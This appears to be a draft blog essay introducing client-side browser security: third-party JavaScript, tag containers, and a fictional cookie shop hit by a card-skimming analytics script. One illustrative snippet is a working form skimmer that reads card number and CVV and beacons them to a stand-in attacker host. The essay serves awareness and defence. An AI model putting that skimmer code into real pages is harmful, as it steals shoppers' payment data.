An Intro to Client-Side Security

The following content is in draft form and may not yet be complete. If you wish to provide feedback or see something that needs correcting, please reach out and let me know.

What is this Monster You Speak of?

When was the last time you bought something online? If I were to make a wager, I’d say it was sometime in the last 24 hours. I myself have a problem and am constantly buying things from Target online (mostly because, with three young kids, there is always something we forgot to pick up).

The thing is, most of us interact with different websites or web applications all day long without even consciously thinking about it. You sign into an account. Perhaps you sign up for a newsletter. Or maybe you forgot one last thing at Target and needed to place one more Instacart order. Regardless of the “why”, the fact remains that most people spend a significant portion of their time using web applications.

What you may not realize, however, is the amount of data you generate as you traverse different digital experiences each and every day. That web page you just loaded generated hundreds of events within your browser…all without you even noticing. Remember that web application you just logged into (through a sign-in form)? It generates events too. More interestingly, it also collects data. Your data. Where it goes, and who has access to it, is often invisible to you.

And now we’ve arrived at our problem. You see, there is this monster that lives within your browser. You don’t know that it’s there, but it sleeps quietly, waiting for the right moment to rear its head. Whether it’s stealing cookies, skimming your data, or just tracking your activity, this monster is wreaking havoc without you even noticing.

I’m of course referring to the monster in the browser.

How Did We Get Here?

We are getting ahead of ourselves though; let’s go back to the beginning, to a time before the monster in the browser even existed. Long ago, at the dawn of the internet, web pages were very static in nature. When you requested a web page, what you saw was what you got. It wasn’t until around the year 2000 that web pages started to become more dynamic.

In 2005, JavaScript use exploded and the language started showing up on web pages all across the web. Suddenly, websites and web applications alike became more dynamic almost overnight. It probably helped that JavaScript shipped by default with two of the most popular browsers at the time: Netscape and Internet Explorer. Fast forward to today and JavaScript powers approximately 98% of all websites and web applications; the de facto language of the web, if you will. Yeah, it’s that big.

As JavaScript’s popularity grew, developers and organizations naturally wanted to put their own touch on it by creating their own plugins and libraries. In fact, JavaScript became so popular that it gave rise to several front-end and back-end frameworks! These frameworks power some of the world’s largest web applications, which is further testament to how pervasive JavaScript has become. Today there are 80+ major JavaScript frameworks and tens of thousands of JavaScript libraries.

Placeholder: The growth of JavaScript from a single language to massive ecosystem.

JavaScript’s immense popularity hasn’t been without its challenges though. As with any popular programming language that has a massive ecosystem, several challenges have surfaced that plague both individual developers and organizations. These challenges include:

  • Vendor lock-in
  • Upgrade hell
  • Scalability limitations
  • Performance challenges

None of these are unique to JavaScript, and you’ll run into most of them as your web application grows and accumulates technical debt, but one item that is notably absent from this list is security. Like any programming language, JavaScript is bound to have vulnerabilities. But JavaScript has a unique twist because it can exist on both the back-end and the front-end. It’s the front-end, or what we will refer to as the “client-side” going forward, that should give organizations pause. But before we talk about securing the client-side…perhaps we should explore exactly how the client-side itself came to be.

The Birth of the Client-Side

When JavaScript was in its infancy, the client-side wasn’t that big (because web pages were so static). It wasn’t until 2006, when libraries like jQuery (one of the most popular and pervasive JavaScript libraries) came about, that we were able to do fancy dynamic things within the client-side. As JavaScript grew up over the years, more business logic and functionality shifted to the client-side as a way to improve web application performance and enhance the end user’s digital experience. But something else happened along the way too: complexity.

A third-party JavaScript library here. An open source JavaScript plugin there. A new JavaScript framework every few months. See, the modern web is not only highly dynamic, it is also incredibly complex. Digital experiences today are often an overlap of multiple technologies in addition to third-party services. These third parties can be consumed in a variety of ways: bundled directly into the code base, pulled in through a snippet of JavaScript that calls out to a third-party domain, or loaded through a technique known as “side-loading”. This complexity ultimately creates trust issues within your (client-side) supply chain and introduces additional risk each time a new element is added to the chain.
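To make that concrete, here is a minimal sketch of the second pattern: a tiny first-party snippet that pulls an entire third-party script onto the page at runtime. The vendor domain and file name below are invented purely for illustration.

    // A typical third-party "snippet": a few lines of first-party JavaScript
    // that load vendor code, at runtime, from a domain you don't control.
    // (The URL is hypothetical.)
    (function () {
      var script = document.createElement('script');
      script.async = true;
      script.src = 'https://cdn.example-analytics.com/collector.js';
      document.head.appendChild(script);
    })();

Whatever collector.js happens to contain today (or tomorrow) runs with the same privileges as your own code inside the visitor’s browser.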

But wait, there’s more! Typically, when developers build websites or web applications, they have the ability to include or exclude any code, library, or service that they want. After all, they are the ones writing the code. However, once the website or web application goes live, other parts of the business will have their own requirements that need to be taken into account. For example, marketing might want to include social media tools for advertising or analytics code to measure web traffic. Product teams might want to understand performance data and how users interact with the website or web application.

Each of these additional tools could be added directly into the code base by the development team, but that often isn’t the case. Instead, a “container”, like Google Tag Manager, is introduced. The development team adds the container code once, and then different teams can add their tools to the web application directly through Google Tag Manager. This cuts down on requests to the development team and empowers the rest of the business to add or remove tools faster, at their own discretion. The ability for different business units to insert their own tools directly through a container is known as “drop-in code”…which unsurprisingly creates another layer of complexity within the client-side (and more risk as well).
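At its core, a tag container is just a more general version of the snippet pattern above: one script the development team installs once, which then injects whatever tags other teams have configured. Below is a heavily simplified sketch of that idea, not the actual Google Tag Manager code; the container endpoint and response shape are invented for illustration.

    // Simplified tag-container pattern (illustrative only, not the real GTM snippet).
    // Developers ship this once; the list of tags it injects is managed elsewhere,
    // by other teams, and can change at any time without a code deployment.
    fetch('https://tags.example-container.com/config/MY-CONTAINER-ID')
      .then(function (response) { return response.json(); })
      .then(function (config) {
        config.tags.forEach(function (tagUrl) {
          var script = document.createElement('script');
          script.async = true;
          script.src = tagUrl; // marketing pixels, analytics, ads, chat widgets...
          document.head.appendChild(script);
        });
      });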

Placeholder: Image of client-side complexity from both developed code and drop-in code.

Finally, we have something known as the data layer. This very thin layer exists within the client-side of your browser, holding data before it is submitted to the back-end for processing or storage. Imagine you are filling out a form or signing into an application; the information you type into the form fields exists within the data layer from the moment you press a key.
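A quick sketch makes this tangible: any script running on the page, whether first-party or third-party, can observe what you type the instant you type it. The field id below is hypothetical.

    // Form data exists in the browser (the data layer) long before the form is
    // ever submitted to the back-end. Any script on the page can read it.
    // (The '#card-number' id is hypothetical.)
    var cardField = document.querySelector('#card-number');
    if (cardField) {
      cardField.addEventListener('keyup', function () {
        console.log('In the data layer right now:', cardField.value);
      });
    }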

Placeholder: Image of the different client-side layers within a browser.

So if we put it all together, we now have a mashup of first-party and third-party code + drop-in code from the different business units + data that is being captured within the browser (the data layer). And I have a headache.

The client-side didn’t start out as a massive complex beast, but it sure has evolved into one over time. And now that we know how it came to be, let’s go back and spotlight the growing risks that stem from this beast.

The (Growing) Invisible Threat

Alright, so we have established that there are growing risks within the client-side, but what exactly do they look like? Well, each time you visit a web page, it is no longer fully built on the back-end and delivered whole…rather, it is assembled in real time in your browser as you request the page. This real-time assembly means that you won’t see these risks in the traditional sense, because they don’t occur until the web page is rendered.

Placeholder: Image of how the client-side is assembled in real-time.

Why exactly do traditional security tools miss these risks? Mostly because the client-side wasn’t an attack surface that existed until fairly recently. Around 2010, everyone was starting to buy into the idea of cloud computing and migrating their workloads out of the data center. Just five short years later, SaaS consumption exploded as well; security had to be reimagined to protect users, data, applications, and systems beyond the traditional security perimeter. Once we bought into the idea that the perimeter was gone, security programs began to change:

  • We invested in protection for cloud workloads inside various cloud environments
  • We secured enterprise SaaS applications and wrangled the remaining shadow IT
  • We began investing more heavily in application security testing (of the back-end)
  • We built various protections into the CI/CD pipeline to protect code and API keys
  • We deployed endpoint security everywhere because people could work from anywhere

Unfortunately, we forgot about the browser itself (and what happens inside of it). It’s no one’s fault really; cybersecurity changes at such a rapid pace, and there is only so much time and money any one organization can invest. You have to make investments where you’ll have the greatest impact on risk reduction for the business. But for client-side security we have reached the tipping point: not just because of the growing risks it poses to organizations, but because of how prevalent the threat itself has become.

Where Application Security Currently Falls Short

Imagine for a minute that you are building a new web application where people can order warm chocolate chip cookies to be delivered right to their front door (I would totally subscribe to this). As we set out to develop, deploy, and maintain this web application we want to ensure that we build in application security testing and protections along the way. Ignoring cost and human capital for a minute, here is what this might look like:

  1. We start with Static Application Security Testing (SAST) of the code we have written. This should call out logic flaws and code vulnerabilities.

  2. Next, we’ll layer in Software Composition Analysis (SCA) which will help identify all the open source components in our code (and possible vulnerabilities).

  3. Using the results from the previous two steps, let’s go ahead and make sure we update or patch any software components / libraries that might have vulnerabilities.

  4. Before we push our code to the staging environment, we’ll use a few DevSecOps tools to look for and strip out secrets, API keys, certificates, encryption keys, etc. from all code repositories.

  5. Once the application is deployed to staging we will begin using Dynamic Application Security Testing (DAST) to again find logic flaws and code vulnerabilities, only this time for the deployed running code.

  6. Things are looking good, we go ahead and push our application to production and make sure it comes up with a valid SSL certificate as well.

  7. Now that our application is in production, we want to layer in some protections for it. Let’s go ahead and deploy a Web Application Firewall (WAF), Bot Protection, and API Protection.

  8. Lastly, we don’t want to have downtime from resource draining attacks so we implement DDoS protection and advanced rate limiting.

Whew. That was a lot to deploy and I’m only typing it out! Imagine what it’s like for security practitioners who have to deploy, configure, operate, and maintain all of these tools, particularly if an organization has a large application portfolio! Definitely adds some perspective. Back to our (fictitious) cookie web application. It’s finally live, we start to advertise on social media networks, we text all of our friends to come try it out, and we submit a link and description to Hacker News. Our efforts pay off and the orders start rolling in! I mean come on, who doesn’t like chocolate chip cookies?!

Suddenly you get an email from a customer saying that their credit card was used for a bunch of purchases they didn’t authorize…all of which started shortly after they bought cookies on your website. Must be a coincidence. But then two more emails roll in with similar complaints. Alright, something is up. You call in all members of the security team and ask everyone to start investigating. Nothing in the logs, no critical vulnerabilities that anyone can find, no spikes in traffic from strange locations. Now the security team starts picking apart the payment page(s) and checkout workflows by hand. What’s changed? Has anything recently been added to the checkout workflow by other business units?

After hours of manually reviewing code, third-party libraries, and network requests, and running several tests, your team narrows the issue down to an analytics tool that the marketing team uses to measure customer conversions during checkout (sorry marketers, I had to pick on someone). The JavaScript file had been modified to include additional code that was (digitally) skimming customer credit cards during the checkout process. You notify the vendor that developed the library, and they begin taking corrective action to mitigate the issue.
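To give a feel for just how little code this takes, here is a hypothetical sketch of what a skimmer hiding inside a “trusted” analytics file might look like. The form id, field ids, and attacker domain are all invented.

    // Hypothetical skimmer buried inside an otherwise legitimate analytics script.
    // It copies card details the moment the shopper submits the checkout form,
    // before the data ever reaches the back-end and its security controls.
    document.addEventListener('submit', function (event) {
      if (event.target.id !== 'checkout-form') return; // hypothetical form id
      var grab = function (selector) {
        var field = document.querySelector(selector);
        return field ? field.value : null;
      };
      var stolen = {
        name: grab('#card-name'),
        number: grab('#card-number'),
        cvv: grab('#card-cvv')
      };
      // Quietly exfiltrate to an attacker-controlled domain alongside the real request.
      navigator.sendBeacon('https://metrics.attacker.example/collect', JSON.stringify(stolen));
    });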

Once the incident is over you bring all the teams together for some retrospective learnings to see what could have been done to prevent this threat and what lessons can be carried forward. Here are the observations from the team:

  • This wasn’t a vulnerability, so it isn’t something our current tooling can scan for and detect in the future
  • Because the tool was a SaaS service that anyone can sign up for and deploy, there was no third-party risk management governance around the vendor
  • The issue existed in our third-party supply chain, but in a unique way because it falls outside the scope of development and application security (it only exists in the client-side code)
  • If a single change to a third-party JavaScript library can cause this big of an issue, how do we inventory and understand what other JavaScript libraries exist across our web application?
  • Even if we had a list of all JavaScript libraries, how do we understand what they are doing? Most (third-party) JavaScript libraries aren’t human-readable and only execute in a live environment like production
  • Because the attack happened on the client-side, there were no logs or events to review, and the credit card data was stolen before the form was submitted to the back-end, where it would have passed through our application security protections

It’s that last point that we all need to sit with for a moment; go ahead, I’ll wait. While this story was meant to highlight the growing risks within the client-side, it also illustrates how these “invisible” risks are going to force us to expand how we think about protecting web applications and the complex digital experiences they deliver. Additionally, this is no longer just an application security issue. We’ve seen several social media companies in the news slapped with fines for “inadvertently” collecting data without the consent of companies or end users. These are not threats in the traditional sense, but the impact is just as real.

Note: The risk to privacy is the second largest digital threat that most organizations are completely unprepared for.

So why then do we continue to use third-party code when it introduces so much risk? Well, there are actually some pretty powerful benefits:

  • Cost savings
  • Faster time to market
  • Code reusability
  • Greater functionality

While it’s hard to argue with these benefits from a business perspective, you can hopefully see from our cookie-selling story that security within the client-side is a growing problem that not enough organizations are currently focusing on. The focus of most organizations is growth, whether through launching new web applications or expanding the features of existing ones. But as more features are added and more capabilities are offered, the complexity reaches a point where, without anyone realizing it, a (client-side) monster is born.
